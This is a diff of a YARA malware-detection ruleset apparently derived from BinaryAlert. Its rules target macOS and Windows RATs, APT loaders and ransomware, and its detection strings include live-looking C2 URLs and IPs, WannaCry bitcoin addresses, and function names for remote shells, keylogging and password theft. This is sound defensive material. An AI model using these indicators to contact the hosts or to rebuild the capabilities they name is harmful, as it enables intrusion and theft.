+		description = "EvilOSX is a pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX."
+		author = "@mimeframe"
+		id = "2b2e62ca-f95c-55c5-aaf6-985aab49dfbb"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/Marten4n6/EvilOSX"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_marten4n6_evilosx.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "836331856200fde9792d3bf97d3a18b7f4497ceaae1cfceb0de7c2949e315b9c"
+		logic_hash = "3402ebf34fd507d0c317416bf77bb3d51b67c8b0f099ce68d15ade6a6a2e302a"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "4bc7ed168fb78f0dc688ee2be20c9703"
-		md5_2 = "8b56e8552a74133da4bc5939b5f74243"
 
 	strings:
-		$a1 = "Vnuk: %d" ascii fullword
-		$a2 = "Syn: %d" ascii fullword
-		$a3 = {25 73 0A 25 73 0A 25 73 0A 25 73 0A}
+		$a1 = "icloud_phish_stop" fullword wide ascii
+		$a2 = "icloud_contacts" fullword wide ascii
+		$a3 = "itunes_backups" fullword wide ascii
+		$a4 = "chrome_passwords" fullword wide ascii
+		$a5 = "Starting EvilOSX..." wide ascii
 
 	condition:
-		2 of ( $a* )
+		4 of ( $a* )
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Encrypted_Keyloger
+rule BINARYALERT_Malware_Macos_Apt_Sofacy_Xagent
 {
 	meta:
-		description = "Rule to detect Moonlight Maze encrypted keylogger logs"
-		author = "Kaspersky Lab"
-		id = "4f290d77-5cb5-5f07-98fd-1829e2f00e63"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_encrypted_keyloger.yara#L1-L11"
+		description = "sofacy xagent for macOS"
+		author = "@mimeframe"
+		id = "91bef771-2ef1-58f6-ae01-3bdde4cc003c"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://blog.malwarebytes.com/cybercrime/2017/03/two-new-mac-backdoors-discovered/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_apt_sofacy_xagent.yara#L3-L62"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "cdcbe112ae394ce0922647904f70cfae626d413d1770b0e20d2ba49e1f4e2d2d"
+		hash = "4fe4b9560e99e33dabca553e2eeee510"
+		logic_hash = "d4b1096e4aeb8382e5abf93d3ecf71cd6ae2ed7afbc9a38549a2fc2739539674"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = ""
 
 	strings:
-		$a1 = {47 01 22 2A 6D 3E 39 2C}
+		$a1 = "remoteShell" ascii wide
+		$a2 = "getInfoOSX" ascii wide
+		$a3 = "ftpUpload" ascii wide
+		$a4 = "startUploading" ascii wide
+		$a5 = "deleteFile:" ascii wide
+		$a6 = "executeShellCommand" ascii wide
+		$a7 = "getFirefoxPassword" ascii wide
+		$a8 = "generateRandomPathAndName" ascii wide
+		$a9 = "createCryptPacket" ascii wide
+		$a10 = "CameraShot" ascii wide
+		$a11 = "7Cryptor" ascii wide
+		$a12 = "8ICryptor" ascii wide
+		$a13 = "Keylogger" ascii wide
+		$a14 = "BootXLoader" ascii wide
+		$a15 = "InjectApp" ascii wide
+		$b1 = "/Project/XAgentOSX/" ascii wide
+		$b2 = "XLoader_OSX" fullword ascii wide
+		$b3 = "<span class='keylog_user_keys'>" ascii wide
+		$b4 = "<span class='keylog_process'>" ascii wide
+		$b5 = "<span class='keylog_spec_key'>" ascii wide
+		$b6 = "<font size=4 color=red><pre>Stop take screenshot</pre></font>" ascii wide
+		$c1 = "http://23.227.196.215/" ascii wide
+		$c2 = "http://apple-iclods.org/" ascii wide
+		$c3 = "http://apple-checker.org/" ascii wide
+		$c4 = "http://apple-uptoday.org/" ascii wide
+		$c5 = "http://apple-search.info" ascii wide
+		$d1 = "watch/?" fullword ascii wide
+		$d2 = "search/?" fullword ascii wide
+		$d3 = "find/?" fullword ascii wide
+		$d4 = "results/?" fullword ascii wide
+		$d5 = "open/?" fullword ascii wide
+		$d6 = "search/?" fullword ascii wide
+		$d7 = "close/?" fullword ascii wide
+		$e1 = "itwm=" fullword ascii wide
+		$e2 = "text=" fullword ascii wide
+		$e3 = "from=" fullword ascii wide
+		$e4 = "itwm=" fullword ascii wide
+		$e5 = "ags=" fullword ascii wide
+		$e6 = "btnG=" fullword ascii wide
+		$e7 = "oprnd=" fullword ascii wide
+		$e8 = "itwm=" fullword ascii wide
+		$e9 = "utm=" fullword ascii wide
+		$e10 = "channel=" fullword ascii wide
 
 	condition:
-		($a1 at 0 )
+		BINARYALERT_Macho_PRIVATE and ( 5 of ( $a* ) or any of ( $b* ) or any of ( $c* ) or 4 of ( $d* ) or 5 of ( $e* ) )
 }
 rule BINARYALERT_Malware_Macos_Neoneggplant_Eggshell
 {
@@ -67820,1050 +67668,1025 @@ rule BINARYALERT_Malware_Macos_Neoneggplant_Eggshell
 	condition:
 		all of ( $a* ) or 3 of ( $b* ) or 3 of ( $c* )
 }
-rule BINARYALERT_Malware_Macos_Proton_Rat_Generic
+rule BINARYALERT_Malware_Multi_Vesche_Basicrat
 {
 	meta:
-		description = "No description has been set in the source file - BinaryAlert"
+		description = "cross-platform Python 2.x Remote Access Trojan (RAT)"
 		author = "@mimeframe"
-		id = "75cfaaff-e8d7-5cd4-953b-7d2011139725"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://objective-see.com/blog/blog_0x1D.html"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_proton_rat_generic.yara#L3-L21"
+		id = "e07a684c-3a3d-5dd3-a540-2cc9a5a170dd"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/vesche/basicRAT"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_vesche_basicrat.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "6a2d0c8b20efc3fa283176a4bc76d6fd"
-		logic_hash = "b7d8660320564cba1d8e2d53d1fdc75509140c7e87a572b27931c62201df2d22"
+		logic_hash = "1503ce9de4e721903058c77b305ba057052d654ff1875ea880f4319c3e525a29"
 		score = 75
-		quality = 64
+		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "SRWebSocket" nocase wide ascii
-		$a2 = "SocketRocket" nocase wide ascii
-		$b1 = "SSH tunnel not launched" nocase wide ascii
-		$b2 = "SSH tunnel still running" nocase wide ascii
-		$b3 = "SSH tunnel already launched" nocase wide ascii
-		$b4 = "Entering interactive session." nocase wide ascii
+		$a1 = "HKCU Run registry key applied" wide ascii
+		$a2 = "HKCU Run registry key failed" wide ascii
+		$a3 = "Error, platform unsupported." wide ascii
+		$a4 = "Persistence successful," wide ascii
+		$a5 = "Persistence unsuccessful," wide ascii
 
 	condition:
-		BINARYALERT_Macho_PRIVATE and any of ( $a* ) and any of ( $b* )
+		all of ( $a* )
 }
-rule BINARYALERT_Malware_Macos_Marten4N6_Evilosx
+rule BINARYALERT_Malware_Multi_Pupy_Rat
 {
 	meta:
-		description = "EvilOSX is a pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX."
+		description = "pupy - opensource cross platform rat and post-exploitation tool"
 		author = "@mimeframe"
-		id = "2b2e62ca-f95c-55c5-aaf6-985aab49dfbb"
-		date = "2017-09-12"
+		id = "b26deb19-85b2-5d39-9ff2-0ab9017f3263"
+		date = "2017-08-11"
 		modified = "2017-09-12"
-		reference = "https://github.com/Marten4n6/EvilOSX"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_marten4n6_evilosx.yara#L1-L16"
+		reference = "https://github.com/n1nj4sec/pupy"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_pupy_rat.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "3402ebf34fd507d0c317416bf77bb3d51b67c8b0f099ce68d15ade6a6a2e302a"
+		logic_hash = "bb5d1e7f2aea94dc41efe75690ae31409e8f6305aa6c4ec0cd46922ee8fb7241"
 		score = 75
-		quality = 80
+		quality = 74
 		tags = ""
 
 	strings:
-		$a1 = "icloud_phish_stop" fullword wide ascii
-		$a2 = "icloud_contacts" fullword wide ascii
-		$a3 = "itunes_backups" fullword wide ascii
-		$a4 = "chrome_passwords" fullword wide ascii
-		$a5 = "Starting EvilOSX..." wide ascii
+		$a1 = "dumping lsa secrets" nocase wide ascii
+		$a2 = "dumping cached domain passwords" nocase wide ascii
+		$a3 = "the keylogger is already started" nocase wide ascii
+		$a4 = "pupyutils.dns" wide ascii
+		$a5 = "pupwinutils.security" wide ascii
+		$a6 = "-PUPY_CONFIG_COMES_HERE-" wide ascii
 
 	condition:
-		4 of ( $a* )
+		3 of ( $a* )
 }
-rule BINARYALERT_Malware_Macos_Bella
+rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_2
 {
 	meta:
-		description = "Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS."
-		author = "@mimeframe"
-		id = "ca4ab508-8c97-5307-9aaf-db10cfd6ab35"
+		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
+		author = "@fusionrace"
+		id = "d97b7fe1-7ff3-5cc0-9085-140ed523421f"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/Trietptm-on-Security/Bella"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_bella.yara#L1-L22"
+		reference = "https://securelist.com/introducing-whitebear/81638/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_2.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "b9c063b5ec8604958d3417ec8640da4314ebcf60ee55413a2f6fa8d138311614"
+		hash = "06bd89448a10aa5c2f4ca46b4709a879"
+		logic_hash = "9bb7fc3b3bf7f91efbba128895bb61b5a1bbdb6625d84836956de5e884ae3fe1"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "Verified! [2FV Enabled] Account ->" wide ascii
-		$a2 = "There is no root shell to perform this command. See [rooter] manual entry." wide ascii
-		$a3 = "Attempt to escalate Bella to root through a variety of attack vectors." wide ascii
-		$a4 = "BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER." wide ascii
-		$b1 = "user_pass_phish" fullword wide ascii
-		$b2 = "bella_info" fullword wide ascii
-		$b3 = "get_root" fullword wide ascii
-		$c1 = "Please specify a bella server." wide ascii
-		$c2 = "What port should Bella connect on [Default is 4545]:" wide ascii
+		$b1 = "i cunt waiting anymore #%d" wide ascii
+		$b2 = "lights aint turnt off with #%d" wide ascii
+		$b3 = "Not find process" wide ascii
+		$b4 = "CMessageProcessingSystem::Receive_TAKE_NOP" wide ascii
+		$b5 = "CMessageProcessingSystem::Receive_TAKE_CAN_NOT_WORK" wide ascii
 
 	condition:
-		any of ( $a* ) or all of ( $b* ) or all of ( $c* )
+		3 of ( $b* )
 }
-rule BINARYALERT_Malware_Macos_Macspy : FILE
+rule BINARYALERT_Malware_Windows_Winnti_Loadperf_Dll_Loader
 {
 	meta:
-		description = "macSpy is a malware-as-a-service (MaaS) product advertised as the most sophisticated Mac spyware ever"
-		author = "AlienVault Labs"
-		id = "5f9a5ed5-a982-552c-a6df-326228eaf459"
+		description = "Winnti APT group; gzwrite64 imported from loadoerf.ini"
+		author = "@mimeframe"
+		id = "41444dd5-41b9-550c-9124-bc7f41326baa"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_macspy.yara#L3-L17"
+		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_winnti_loadperf_dll_loader.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "6c03e4a9bcb9afaedb7451a33c214ae4"
-		logic_hash = "f04648860c9602e43516113000908008847dacfbe189d79e13737bcd034b68a0"
+		hash = "879ce99e253e598a3c156258a9e81457"
+		logic_hash = "b1035174edfff2e142026f3482fc53407af59f5215a6030c0d2a85501152c3db"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$header0 = {cf fa ed fe}
-		$header1 = {ce fa ed fe}
-		$header2 = {ca fe ba be}
-		$c1 = { 76 31 09 00 76 32 09 00 76 33 09 00 69 31 09 00 69 32 09 00 69 33 09 00 69 34 09 00 66 31 09 00 66 32 09 00 66 33 09 00 66 34 09 00 74 63 3A 00 }
+		$s1 = "loadoerf.ini" fullword ascii wide
+		$s2 = "gzwrite64" fullword ascii wide
+
+	condition:
+		all of ( $s* )
+}
+rule BINARYALERT_Malware_Windows_Xrat_Quasarrat
+{
+	meta:
+		description = "xRAT is a derivative of QuasarRAT; this catches both RATs."
+		author = "@mimeframe"
+		id = "f4db2402-3653-5525-a137-de2de29cef28"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/quasar/QuasarRAT"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_xrat_quasarrat.yara#L1-L31"
+		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
+		logic_hash = "92533157a62ccae5d1bdc9d0bb7511817422c6b5d75d013a15173cd1121d099e"
+		score = 75
+		quality = 30
+		tags = ""
+
+	strings:
+		$a1 = ">> New Session created" wide ascii
+		$a2 = ">> Session unexpectedly closed" wide ascii
+		$a3 = ">> Session closed" wide ascii
+		$a4 = "session unexpectedly closed" wide ascii
+		$a5 = "cmd" fullword wide ascii
+		$a6 = "/K" fullword wide ascii
+		$b1 = "echo DONT CLOSE THIS WINDOW!" wide ascii
+		$b2 = "ping -n 20 localhost > nul" wide ascii
+		$b3 = "Downloading file..." wide ascii
+		$b4 = "Visited Website" wide ascii
+		$b5 = "Adding Autostart Item failed!" wide ascii
+		$b6 = ":Zone.Identifier" wide ascii
+		$c1 = "GetDrives I/O error" wide ascii
+		$c2 = "/r /t 0" wide ascii
+		$c3 = "desktop.ini" wide ascii
+		$c4 = "WAN IP Address" wide ascii
+		$c5 = "User refused the elevation request." wide ascii
+		$c6 = "Process already elevated." wide ascii
 
 	condition:
-		($header0 at 0 or $header1 at 0 or $header2 at 0 ) and $c1
+		5 of ( $a* ) or 5 of ( $b* ) or 5 of ( $c* )
 }
-rule BINARYALERT_Malware_Macos_Apt_Sofacy_Xagent
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Cle_Tool
 {
 	meta:
-		description = "sofacy xagent for macOS"
-		author = "@mimeframe"
-		id = "91bef771-2ef1-58f6-ae01-3bdde4cc003c"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://blog.malwarebytes.com/cybercrime/2017/03/two-new-mac-backdoors-discovered/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_apt_sofacy_xagent.yara#L3-L62"
+		description = "Rule to detect Moonlight Maze 'cle' log cleaning tool"
+		author = "Kaspersky Lab"
+		id = "d875a3cf-cad1-509f-bb9f-27f0a3a9b79d"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_cle_tool.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "4fe4b9560e99e33dabca553e2eeee510"
-		logic_hash = "d4b1096e4aeb8382e5abf93d3ecf71cd6ae2ed7afbc9a38549a2fc2739539674"
+		hash = "647d7b711f7b4434145ea30d0ef207b0"
+		logic_hash = "8f75df1240b9e5e905492106265a7e1342db4140d715529933af4ba5c8ec6331"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "remoteShell" ascii wide
-		$a2 = "getInfoOSX" ascii wide
-		$a3 = "ftpUpload" ascii wide
-		$a4 = "startUploading" ascii wide
-		$a5 = "deleteFile:" ascii wide
-		$a6 = "executeShellCommand" ascii wide
-		$a7 = "getFirefoxPassword" ascii wide
-		$a8 = "generateRandomPathAndName" ascii wide
-		$a9 = "createCryptPacket" ascii wide
-		$a10 = "CameraShot" ascii wide
-		$a11 = "7Cryptor" ascii wide
-		$a12 = "8ICryptor" ascii wide
-		$a13 = "Keylogger" ascii wide
-		$a14 = "BootXLoader" ascii wide
-		$a15 = "InjectApp" ascii wide
-		$b1 = "/Project/XAgentOSX/" ascii wide
-		$b2 = "XLoader_OSX" fullword ascii wide
-		$b3 = "<span class='keylog_user_keys'>" ascii wide
-		$b4 = "<span class='keylog_process'>" ascii wide
-		$b5 = "<span class='keylog_spec_key'>" ascii wide
-		$b6 = "<font size=4 color=red><pre>Stop take screenshot</pre></font>" ascii wide
-		$c1 = "http://23.227.196.215/" ascii wide
-		$c2 = "http://apple-iclods.org/" ascii wide
-		$c3 = "http://apple-checker.org/" ascii wide
-		$c4 = "http://apple-uptoday.org/" ascii wide
-		$c5 = "http://apple-search.info" ascii wide
-		$d1 = "watch/?" fullword ascii wide
-		$d2 = "search/?" fullword ascii wide
-		$d3 = "find/?" fullword ascii wide
-		$d4 = "results/?" fullword ascii wide
-		$d5 = "open/?" fullword ascii wide
-		$d6 = "search/?" fullword ascii wide
-		$d7 = "close/?" fullword ascii wide
-		$e1 = "itwm=" fullword ascii wide
-		$e2 = "text=" fullword ascii wide
-		$e3 = "from=" fullword ascii wide
-		$e4 = "itwm=" fullword ascii wide
-		$e5 = "ags=" fullword ascii wide
-		$e6 = "btnG=" fullword ascii wide
-		$e7 = "oprnd=" fullword ascii wide
-		$e8 = "itwm=" fullword ascii wide
-		$e9 = "utm=" fullword ascii wide
-		$e10 = "channel=" fullword ascii wide
+		$a1 = "./a filename template_file" ascii wide
+		$a2 = "May be %s is empty?" ascii wide
+		$a3 = "template string = |%s|" ascii wide
+		$a4 = "No blocks !!!"
+		$a5 = "No data in this block !!!!!!" ascii wide
+		$a6 = "No good line"
 
 	condition:
-		BINARYALERT_Macho_PRIVATE and ( 5 of ( $a* ) or any of ( $b* ) or any of ( $c* ) or 4 of ( $d* ) or 5 of ( $e* ) )
+		3 of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Hydracrypt
+rule BINARYALERT_Malware_Windows_Moonlightmaze_De_Tool
 {
 	meta:
-		description = "HydraCrypt encrypts a victim’s files and appends the filenames with the extension “hydracrypt_ID_*"
-		author = "@fusionrace"
-		id = "9ebf205e-b6a9-55a3-b0c3-9b088790dc9a"
+		description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool"
+		author = "Kaspersky Lab"
+		id = "8b943c21-eac7-521d-8dc6-90d611aa4d92"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/hydracrypt-variant-of-ransomware-distributed-by-angler-exploit-kit/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara#L1-L16"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_de_tool.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "08b304d01220f9de63244b4666621bba"
-		logic_hash = "3ecb3e6c269f4145e60b0e7bb0e896120ceb2db2123f847bf4bdf5d4490467d5"
+		logic_hash = "836331856200fde9792d3bf97d3a18b7f4497ceaae1cfceb0de7c2949e315b9c"
 		score = 75
 		quality = 80
 		tags = ""
+		md5_1 = "4bc7ed168fb78f0dc688ee2be20c9703"
+		md5_2 = "8b56e8552a74133da4bc5939b5f74243"
 
 	strings:
-		$u0 = "oTraining" fullword ascii wide
-		$u1 = "Stop Training" fullword ascii wide
-		$u2 = "Play \"sound.wav\"" fullword ascii wide
-		$u3 = "&Start Recording" fullword ascii wide
-		$u4 = "7About record" fullword ascii wide
+		$a1 = "Vnuk: %d" ascii fullword
+		$a2 = "Syn: %d" ascii fullword
+		$a3 = {25 73 0A 25 73 0A 25 73 0A 25 73 0A}
 
 	condition:
-		all of them
+		2 of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Zcrypt
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki2Crypto
 {
 	meta:
-		description = "Zcrypt will encrypt data and append the .zcrypt extension to the filenames"
-		author = "@fusionrace"
-		id = "d79cd266-4e77-562c-975c-8bf72efe7242"
+		description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */"
+		author = "Costin Raiu, Kaspersky Lab"
+		id = "eb5fc283-4994-5db5-965d-e90caad95f4c"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://blog.malwarebytes.com/threat-analysis/2016/06/zcrypt-ransomware/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara#L1-L23"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki2crypto.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "d1e75b274211a78d9c5d38c8ff2e1778"
-		logic_hash = "df4073363da162e69f29493b5bfb4cb3f3d342357335c13ba6a3ac868607cb25"
+		logic_hash = "abb2093844af1b854a9deed5baab3f4d67bd1189a4520f697aa69b7441d9488c"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = ""
+		md5_1 = "19fbd8cbfb12482e8020a887d6427315"
+		md5_2 = "ea06b213d5924de65407e8931b1e4326"
+		md5_3 = "14ecd5e6fc8e501037b54ca263896a11"
+		md5_4 = "e079ec947d3d4dacb21e993b760a65dc"
+		md5_5 = "edf900cebb70c6d1fcab0234062bfc28"
 
 	strings:
-		$u1 = "How to Buy Bitcoins" ascii wide
-		$u2 = "ALL YOUR PERSONAL FILES ARE ENCRYPTED" ascii wide
-		$u3 = "Click Here to Show Bitcoin Address" ascii wide
-		$u4 = "MyEncrypter2.pdb" fullword ascii wide
-		$g1 = ".p7b" fullword ascii wide
-		$g2 = ".p7c" fullword ascii wide
-		$g3 = ".pdd" fullword ascii wide
-		$g4 = ".pef" fullword ascii wide
-		$g5 = ".pem" fullword ascii wide
-		$g6 = "How to decrypt files.html" fullword ascii wide
+		$modulus = {DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49}
 
 	condition:
-		any of ( $u* ) or all of ( $g* )
+		$modulus
 }
-rule BINARYALERT_Ransomware_Windows_Wannacry
+rule BINARYALERT_Malware_Windows_Remcos_Rat
 {
 	meta:
-		description = "wannacry ransomware for windows"
-		author = "@fusionrace"
-		id = "0269b6f4-a47d-5683-aaaa-2141ca7f04dc"
+		description = "No description has been set in the source file - BinaryAlert"
+		author = "@mimeframe"
+		id = "420c135f-3150-5cb9-9c1c-105cd260d713"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_wannacry.yara#L1-L23"
+		reference = "https://breaking-security.net/remcos/remcos-changelog/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_remcos_rat.yara#L1-L20"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "4fef5e34143e646dbf9907c4374276f5"
-		logic_hash = "c01f460c0f5e39cde5f553c966553fe693e5203cb020b8f571eac6fc193fa91b"
+		hash = "c8dafe143fe1d81ae6a3c0cd4724b272"
+		logic_hash = "ec1ec69f628111235bafad8177482256ed571c064a81f01b6ec2643dccc926ad"
 		score = 75
-		quality = 50
+		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "msg/m_chinese" wide ascii
-		$a2 = ".wnry" wide ascii
-		$a3 = "attrib +h" wide ascii
-		$b1 = "WNcry@2ol7" wide ascii
-		$b2 = "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" wide ascii
-		$b3 = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" wide ascii
-		$b4 = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" wide ascii
-		$b5 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" wide ascii
+		$a1 = "[Following text has been pasted from clipboard:]" wide ascii
+		$a2 = "[Chrome StoredLogins found, cleared!]" wide ascii
+		$a3 = "[Firefox StoredLogins cleared!]" wide ascii
+		$b1 = "getclipboard" wide ascii
+		$b2 = "stopmiccapture" wide ascii
+		$b3 = "downloadfromurltofile" wide ascii
+		$b4 = "getcamsingleframe" wide ascii
+		$c1 = "Breaking-Security.Net" wide ascii
+		$c2 = "REMCOS v" wide ascii
 
 	condition:
-		all of ( $a* ) or any of ( $b* )
+		any of ( $a* ) or 3 of ( $b* ) or all of ( $c* )
 }
-rule BINARYALERT_Ransomware_Windows_Hddcryptora
+rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_1
 {
 	meta:
-		description = "The HDDCryptor ransomware encrypts local harddisks as well as resources in network shares via Server Message Block (SMB)"
+		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
 		author = "@fusionrace"
-		id = "56d7f1f5-811d-58c9-9e1d-d2f48c01e167"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_HDDCryptorA.yara#L1-L23"
+		id = "6b5709fd-a923-56b6-98ab-ae036f9d04c3"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://securelist.com/introducing-whitebear/81638/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_1.yara#L1-L22"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "498bdcfb93d13fecaf92e96f77063abf"
-		logic_hash = "24c113be31c3df7b544a5789bf055f77471d450c07f0a6729a715e2a82b4d1f0"
+		hash = "b099b82acb860d9a9a571515024b35f0"
+		logic_hash = "f6706c66a378b80d3cedf118a812d8add60e12b44402a30d941d08ff30c7ab1c"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = ""
 
 	strings:
-		$u1 = "You are Hacked" fullword ascii wide
-		$u2 = "Your H.D.D Encrypted , Contact Us For Decryption Key" nocase ascii wide
-		$u3 = "start hard drive encryption..." ascii wide
-		$u4 = "Your hard drive is securely encrypted" ascii wide
-		$g1 = "Wipe All Passwords?" ascii wide
-		$g2 = "SYSTEM\\CurrentControlSet\\Services\\dcrypt\\config" ascii wide
-		$g3 = "DiskCryptor" ascii wide
